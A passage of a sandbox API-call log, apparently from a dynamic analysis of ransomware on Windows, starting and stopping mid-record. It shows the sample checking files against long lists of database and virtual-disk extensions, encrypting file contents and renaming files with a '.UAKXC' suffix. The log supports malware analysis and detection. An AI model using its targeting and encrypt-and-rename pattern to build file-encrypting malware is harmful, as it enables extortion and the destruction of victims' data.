(lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".xmlff") returned 0x0 [0140.719] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".abcddb") returned 0x0 [0140.719] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".abs") returned 0x0 [0140.719] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".abx") returned 0x0 [0140.719] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".accdw") returned 0x0 [0140.719] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".adn") returned 0x0 [0140.719] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".db2") returned 0x0 [0140.719] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".fm5") returned 0x0 [0140.719] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".hjt") returned 0x0 [0140.719] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".icg") returned 0x0 [0140.719] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".icr") returned 0x0 [0140.719] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".kdb") returned 0x0 [0140.719] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".lut") returned 0x0 [0140.719] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".maw") returned 0x0 [0140.719] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".mdn") returned 0x0 [0140.719] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".mdt") returned 0x0 [0140.719] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".vdi") returned 0x0 [0140.719] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".vhd") returned 0x0 [0140.719] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".vmdk") returned 0x0 [0140.719] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".pvm") returned 0x0 [0140.719] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".vmem") returned 0x0 [0140.719] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".vmsn") returned 0x0 [0140.719] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".vmsd") returned 0x0 [0140.719] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".nvram") returned 0x0 [0140.719] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".vmx") returned 0x0 [0140.720] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".raw") returned 0x0 [0140.720] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".qcow2") returned 0x0 [0140.720] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".subvol") returned 0x0 [0140.720] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".bin") returned 0x0 [0140.720] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".vsv") returned 0x0 [0140.720] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".avhd") returned 0x0 [0140.720] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".vmrs") returned 0x0 [0140.720] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".vhdx") returned 0x0 [0140.720] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".avdx") returned 0x0 [0140.720] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".vmcx") returned 0x0 [0140.720] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpSrch=".iso") returned 0x0 [0140.720] SetFilePointerEx (in: hFile=0x6c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.720] WriteFile (in: hFile=0x6c8, lpBuffer=0x397fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x397fc78, lpOverlapped=0x0 | out: lpBuffer=0x397fd70*, lpNumberOfBytesWritten=0x397fc78*=0x20c, lpOverlapped=0x0) returned 1 [0140.721] WriteFile (in: hFile=0x6c8, lpBuffer=0x397fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x397fc7c, lpOverlapped=0x0 | out: lpBuffer=0x397fc80*, lpNumberOfBytesWritten=0x397fc7c*=0xa, lpOverlapped=0x0) returned 1 [0140.722] SetEndOfFile (hFile=0x6c8) returned 1 [0140.722] SetFilePointerEx (in: hFile=0x6c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.722] ReadFile (in: hFile=0x6c8, lpBuffer=0x4b20000, nNumberOfBytesToRead=0x146, lpNumberOfBytesRead=0x397fc88, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesRead=0x397fc88*=0x146, lpOverlapped=0x0) returned 1 [0140.722] SetFilePointerEx (in: hFile=0x6c8, liDistanceToMove=0xfffffeba, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.722] WriteFile (in: hFile=0x6c8, lpBuffer=0x4b20000*, nNumberOfBytesToWrite=0x146, lpNumberOfBytesWritten=0x397fc44, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesWritten=0x397fc44*=0x146, lpOverlapped=0x0) returned 1 [0140.722] CloseHandle (hObject=0x6c8) returned 1 [0140.728] GetProcessHeap () returned 0xea0000 [0140.728] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0xef34d0 [0140.728] lstrcpyW (in: lpString1=0xef34d0, lpString2="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn" | out: lpString1="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn") returned="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn" [0140.728] lstrcatW (in: lpString1="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpString2=".UAKXC" | out: lpString1="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn.UAKXC") returned="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn.UAKXC" [0140.728] MoveFileW (lpExistingFileName="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.excel.14.1033.hxn"), lpNewFileName="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.14.1033.hxn.UAKXC" (normalized: "c:\\programdata\\microsoft help\\ms.excel.14.1033.hxn.uakxc")) returned 1 [0140.729] GetProcessHeap () returned 0xea0000 [0140.729] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef34d0 | out: hHeap=0xea0000) returned 1 [0140.729] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeeb30 | out: hHeap=0xea0000) returned 1 [0140.729] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6d30 | out: hHeap=0xea0000) returned 1 [0140.729] CryptGenRandom (in: hProv=0xecf568, dwLen=0x20, pbBuffer=0x397fd50 | out: pbBuffer=0x397fd50) returned 1 [0140.729] CryptGenRandom (in: hProv=0xecf568, dwLen=0x8, pbBuffer=0x397fd48 | out: pbBuffer=0x397fd48) returned 1 [0140.729] CryptEncrypt (in: hKey=0xecf820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x200) returned 1 [0140.730] GetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.excel.dev.14.1033.hxn")) returned 0x2022 [0140.731] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.excel.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6c8 [0140.731] GetLastError () returned 0x0 [0140.731] GetFileSizeEx (in: hFile=0x6c8, lpFileSize=0x397fc88 | out: lpFileSize=0x397fc88*=350) returned 1 [0140.731] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".4dd") returned 0x0 [0140.731] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".4dl") returned 0x0 [0140.731] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".accdb") returned 0x0 [0140.731] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".accdc") returned 0x0 [0140.731] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".accde") returned 0x0 [0140.731] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".accdr") returned 0x0 [0140.731] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".accdt") returned 0x0 [0140.731] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".accft") returned 0x0 [0140.731] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".adb") returned 0x0 [0140.731] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".ade") returned 0x0 [0140.731] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".adf") returned 0x0 [0140.731] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".adp") returned 0x0 [0140.731] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".arc") returned 0x0 [0140.732] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".ora") returned 0x0 [0140.732] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".alf") returned 0x0 [0140.732] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".ask") returned 0x0 [0140.732] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".btr") returned 0x0 [0140.732] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".bdf") returned 0x0 [0140.732] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".cat") returned 0x0 [0140.732] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".cdb") returned 0x0 [0140.732] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".ckp") returned 0x0 [0140.732] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".cma") returned 0x0 [0140.732] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".cpd") returned 0x0 [0140.732] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".dacpac") returned 0x0 [0140.732] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".dad") returned 0x0 [0140.732] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".dadiagrams") returned 0x0 [0140.732] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".daschema") returned 0x0 [0140.732] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".db") returned 0x0 [0140.732] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".db-shm") returned 0x0 [0140.732] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".db-wal") returned 0x0 [0140.732] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".db3") returned 0x0 [0140.732] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".dbc") returned 0x0 [0140.733] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".dbf") returned 0x0 [0140.733] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".dbs") returned 0x0 [0140.733] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".dbt") returned 0x0 [0140.733] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".dbv") returned 0x0 [0140.733] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".dbx") returned 0x0 [0140.733] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".dcb") returned 0x0 [0140.733] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".dct") returned 0x0 [0140.733] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".dcx") returned 0x0 [0140.733] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".ddl") returned 0x0 [0140.733] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".dlis") returned 0x0 [0140.733] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".dp1") returned 0x0 [0140.733] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".dqy") returned 0x0 [0140.733] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".dsk") returned 0x0 [0140.733] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".dsn") returned 0x0 [0140.733] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".dtsx") returned 0x0 [0140.733] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".dxl") returned 0x0 [0140.733] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".eco") returned 0x0 [0140.733] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".ecx") returned 0x0 [0140.733] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".edb") returned 0x0 [0140.733] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".epim") returned 0x0 [0140.733] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".exb") returned 0x0 [0140.734] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".fcd") returned 0x0 [0140.734] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".fdb") returned 0x0 [0140.734] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".fic") returned 0x0 [0140.734] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".fmp") returned 0x0 [0140.734] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".fmp12") returned 0x0 [0140.734] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".fmpsl") returned 0x0 [0140.734] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".fol") returned 0x0 [0140.734] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".fp3") returned 0x0 [0140.734] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".fp4") returned 0x0 [0140.734] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".fp5") returned 0x0 [0140.734] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".fp7") returned 0x0 [0140.734] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".fpt") returned 0x0 [0140.734] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".frm") returned 0x0 [0140.734] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".gdb") returned 0x0 [0140.734] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".grdb") returned 0x0 [0140.734] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".gwi") returned 0x0 [0140.734] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".hdb") returned 0x0 [0140.734] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".his") returned 0x0 [0140.734] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".ib") returned 0x0 [0140.734] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".idb") returned 0x0 [0140.735] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".ihx") returned 0x0 [0140.735] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".itdb") returned 0x0 [0140.735] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".itw") returned 0x0 [0140.735] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".jet") returned 0x0 [0140.735] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".jtx") returned 0x0 [0140.735] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".kdb") returned 0x0 [0140.735] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".kexi") returned 0x0 [0140.735] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".kexic") returned 0x0 [0140.735] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".kexis") returned 0x0 [0140.735] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".lgc") returned 0x0 [0140.735] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".lwx") returned 0x0 [0140.735] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".maf") returned 0x0 [0140.735] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".maq") returned 0x0 [0140.735] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".mar") returned 0x0 [0140.735] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".mas") returned 0x0 [0140.735] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".mav") returned 0x0 [0140.735] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".mdb") returned 0x0 [0140.735] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".mdf") returned 0x0 [0140.735] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".mpd") returned 0x0 [0140.735] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".mrg") returned 0x0 [0140.735] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".mud") returned 0x0 [0140.736] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".mwb") returned 0x0 [0140.736] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".myd") returned 0x0 [0140.736] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".ndf") returned 0x0 [0140.736] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".nnt") returned 0x0 [0140.736] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".nrmlib") returned 0x0 [0140.736] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".ns2") returned 0x0 [0140.736] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".ns3") returned 0x0 [0140.736] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".ns4") returned 0x0 [0140.736] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".nsf") returned 0x0 [0140.736] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".nv") returned 0x0 [0140.736] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".nv2") returned 0x0 [0140.736] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".nwdb") returned 0x0 [0140.736] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".nyf") returned 0x0 [0140.736] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".odb") returned 0x0 [0140.736] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".oqy") returned 0x0 [0140.736] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".orx") returned 0x0 [0140.736] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".owc") returned 0x0 [0140.736] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".p96") returned 0x0 [0140.736] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".p97") returned 0x0 [0140.736] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".pan") returned 0x0 [0140.737] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".pdb") returned 0x0 [0140.737] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".pdm") returned 0x0 [0140.737] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".pnz") returned 0x0 [0140.737] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".qry") returned 0x0 [0140.737] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".qvd") returned 0x0 [0140.737] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".rbf") returned 0x0 [0140.737] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".rctd") returned 0x0 [0140.737] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".rod") returned 0x0 [0140.737] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".rodx") returned 0x0 [0140.737] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".rpd") returned 0x0 [0140.737] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpSrch=".rsd") returned 0x0 [0140.737] StrStrIW 